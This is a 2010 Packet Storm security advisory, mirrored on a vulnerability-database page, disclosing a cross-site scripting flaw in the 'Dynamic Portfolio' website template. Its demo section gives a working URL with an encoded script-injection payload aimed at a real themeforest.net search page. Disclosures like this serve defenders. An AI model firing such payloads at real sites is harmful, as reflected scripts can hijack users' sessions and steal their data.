Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormL0rd CrusAd3rPACKETSTORM:90529
HistoryJun 09, 2010 - 12:00 a.m.

Dynamic Portfolio Template Cross Site Scripting

2010-06-0900:00:00
L0rd CrusAd3r
packetstormsecurity.com
19
JSON
`  
  
Author: L0rd CrusAd3r aka VSN [[email protected]]  
Exploit Title: Dynamic Portfolio Template XSS Vulnerability  
Version:1.0  
Platform:Linux, Windows  
Price:12$  
Vendor url:http://themeforest.net  
Published: 2010-06-09  
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue™®, S1ayer and to all ICW  
members  
#############################################################################################################################################################################  
  
  
Dynamic Portfolio Template XSS Vulnerability  
  
Author: L0rd CrusAd3r aka VSN [[email protected]]  
  
#############################################################################################################################################################################  
  
Description:  
  
Dynamic Portfolio is designed to be used as design or photography portfolio  
website.  
It is easy to install and update, all you have to do is to copy the files  
on your server, add some of your portfolio examples and you be up and  
running in no time.  
  
Features:  
  
Valid XHTML, tableless Design jQuery Support:  
Vertical smoth scrolling website Featured portfolio item Portfolio item  
slider Customized browser scrollbar with CSS  
jQuery Elegant preview with lightbox Working jQuery/PHP contact form All  
source PSD files included Documentation File  
###############################################################################################################################################################################  
  
Vulnerability:  
  
*XSS Vulnerability found  
  
DEMO URL :  
http://themeforest.net/searches?term=%27%22--%3E%3Cscript%3Ealert%280x000872%29%3C%2Fscript%3E&type=%2722  
  
  
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
# 0day no more #  
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
  
  
################################################################################################################################################################################  
--   
With R3gards,  
L0rd CrusAd3r  
  
  
  
`
JSON